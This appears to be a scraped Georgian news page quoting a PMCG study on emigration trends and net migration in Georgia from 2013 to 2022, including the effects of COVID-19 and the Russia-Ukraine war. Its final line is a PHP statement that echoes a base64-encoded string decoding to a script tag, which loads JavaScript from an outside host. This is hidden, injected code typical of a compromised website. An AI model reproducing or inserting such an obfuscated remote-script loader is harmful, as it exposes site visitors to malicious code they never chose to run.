celsiusi
ავერსი შნაიდერი

PMCG-ს კვლევაში აღნიშნულია, რომ საქართველო ემიგრაციის ქვეყნად მიიჩნევა. 

„2013 წლიდან 2017 წლამდე ემიგრაციული ნაკადი საქართველოდან 6%-ით შემცირდა და მან 85 ათასი ადამიანი შეადგინა. ამ პერიოდში საშუალოდ მიგრაციული სალდო 4-7 ათასი იყო.

2018 წლიდან ემიგრაციული ნაკადები გაიზარდა და 2019 წელს 105 ათასს მიაღწია. სხვა ფაქტორებთან ერთად 2018 წლიდან ემიგრაციული ნაკადის ზრდა, შესაძლოა, ევროკავშირსა და საქართველოს შორის 2017 წელს დადებულმა სავიზო ლიბერალიზაციის შეთანხმებამ განაპირობა.

2020 წელს, COVID-19-ის პანდემიისა და მოგზაურობის შეზღუდვების გამო ემიგრაციული ნაკადი 74 ათასამდე შემცირდა, მიგრაციულმა სალდომ კი 16 ათასი შეადგინა.

თუმცა 2021 წელს ემიგრაციული ნაკადი 100 ათას ადამიანამდე გაიზარდა და ბოლო ათწლეულში ყველაზე მაღალი უარყოფითი მიგრაციული სალდო დაფიქსირდა (-26 ათასი).

2022 წელს ემიგრაციული ნაკადი კიდევ უფრო გაიზარდა და ბოლო ათწლეულში ყველაზე მაღალ მაჩვენებელს, 125 ათას ადამიანს მიაღწია. აღსანიშნავია, რომ მიგრაციული სალდოც მნიშვნელოვნად გაიზარდა - 55 ათას ადამიანამდე. რაც ბოლო ათწლეულში ყველაზე მაღალი დადებითი მაჩვენებელი იყო.

2022 წელს მიგრაციული სალდოს ზრდა რუსეთ-უკრაინის ომმა გამოიწვია. კერძოდ, სხვადასხვა მიზეზის გამო, ბევრმა რუსმა, ბელარუსმა, უკრაინელმა და რუსეთსა და უკრაინაში მცხოვრებმა საქართველოს მოქალაქემ გადაწყვიტა საქართველოში გადმოსვლა.

შეჯამების სახით შეიძლება ითქვას, რომ გასულ ათწლეულში საშუალო ემიგრაციულმა ნაკადმა 97 ათასი შეადგინა, ხოლო მიგრაციულმა სალდომ 300 ადამიანი. თუმცა, თუ გამოვრიცხავთ ფორსმაჟორულ მოვლენებს (COVID-19-ის პანდემიასა და უკრაინაში მიმდინარე ომს), საშუალო მიგრაციული სალდო - 7 ათასია,“- აღნიშნულია კვლევაში.

212
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");